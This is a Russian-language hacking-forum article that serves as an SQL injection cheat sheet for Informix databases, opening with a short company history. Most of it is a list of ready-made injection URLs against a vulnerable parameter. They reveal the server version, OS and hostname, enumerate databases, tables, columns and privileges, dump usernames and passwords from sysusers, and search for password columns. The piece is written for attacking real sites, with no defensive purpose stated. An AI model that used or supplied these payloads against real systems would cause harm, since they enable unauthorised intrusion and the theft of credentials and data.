[intro] Всем доброго времени суток. Сейчас я расскажу Вам о SQL уязвимости в СУБД Informix. [history] Компания Informix основана в 1980 Роджером Сипплом и Лаурой Кинг, а осенью 1986 компания акционировалась. Фирма Informix вошла в число первых разработчиков технологий реляционных баз данных. Informix первой предложила реляционную систему управления базами данных (РСУБД) на базе UNIX, архитектуру оперативной обработки транзакций (OLTP) для UNIX, язык программирования четвертого поколения (4GL) для UNIX. Последним достижением компании стала объектно-реляционная технология для UNIX и Microsoft Windows NT, которую компания первой предложила на рынок. При выработке технологической стратегии компания всегда руководствовалась результатами научно- исследовательской деятельности и маркетингового анализа. Это позволило фирме Informix выйти на лидирующие позиции и самой задавать темп развития рынка баз данных. [injection] Error Код: [Informix][Informix ODBC Driver][Informix]Corresponding column types must be compatible for each UNION statement. Узнаём версию БД: Код: http://site.com/about.cmf?var=-1+select+dbinfo('version','full')+from+systables+where+tabid=1; Код: http://site.com/about.cmf?var=-1+select+dbinfo('version','server-type')+from+systables+where+tabid=1; Код: http://site.com/about.cmf?var=-1+select+dbinfo('version', 'major'),dbinfo('version','minor'),dbinfo('version', 'level')+from+systables+where+tabid=1; Паралельно узнаём на какой операционной системе стоит сервер: Код: Вывод=ОС T=Windows U=32-bit Unix H=64-bit Unix(приложение 32-bit) F=64-bit Unix(приложение 64-bit) Текущий пользователь БД: Код: http://site.com/about.cmf?var=-1+select+user+from+systables+where+tabid=1; Код: http://site.com/about.cmf?var=-1+select+current_role=from+systables+where+tabid=1; Список пользователей: Код: http://site.com/about.cmf?var=-1+select+username,usertype,password+from+sysusers; Привилегии: Код: http://site.com/about.cmf?var=-1+select+tabname,grantor,grantee,tabauth+from+systabauth+join+systables+on+systables.tabid=systabauth.tabid; Узнаём у каких юзверей есть права на доступ к таблицам Код: http://site.com/about.cmf?var=-1+select+procname,owner,grantor,grantee+from+sysprocauth+join+sysprocedures+on+sysprocauth.procid=sysprocedures.procid; Узнаём у каких юзверей есть права на запуск команд, процессов Текущая БД: Код: http://site.com/about.cmf?var=-1+select+dbservername+from+systables+where+tabid=1; Список БД: Код: http://site.com/about.cmf?var=-1+select+name,owner+from+sysdatabases; Колонки: Код: http://site.com/about.cmf?var=-1+select+tabname,colname,owner,coltype+from+syscolumns+join+systables+on+syscolumns.tabid=systables.tabid; Таблицы: Код: http://site.com/about.cmf?var=-1+select+tabname,owner+from+systables; Код: http://site.com/about.cmf?var=-1+select+tabname,viewtext+from+sysviews+join+systables+on+systables.tabid=sysviews.tabid; Процедуры: Код: http://site.com/about.cmf?var=-1+select+procname,owner+from+sysprocedures; Поиск таблиц по колонкам: Код: http://site.com/about.cmf?var=-1+select+tabname,colname,owner,coltype+from+syscolumns+join+systables+on+syscolumns.tabid=systables.tabid+where+colname+like+'%pass%'; Char -> ASCII: Код: http://site.com/about.cmf?var=-1+select+ascii('A')+from+systables+where+tabid=1; Конкатенация строки: Код: http://site.com/about.cmf?var=-1+select+'A'||'B'+from+systables+where+tabid=1; Возвращяет 'AB' Код: http://site.com/about.cmf?var=-1+select+concat('A','B')+from+systables+where+tabid=1; Возвращяет 'AB' Узнаём ИП сервера: Код: http://site.com/about.cmf?var=-1+select+dbinfo('dbhostname')+from+systables+where+tabid=1; Cистемные БД: Код: sysmaster sysadmin* sysuser* sysutils* *= нет прав доступа Надеюсь из моей статьи извлекли что-нибудь новое. С Вами был Hookman, специально для xaker.name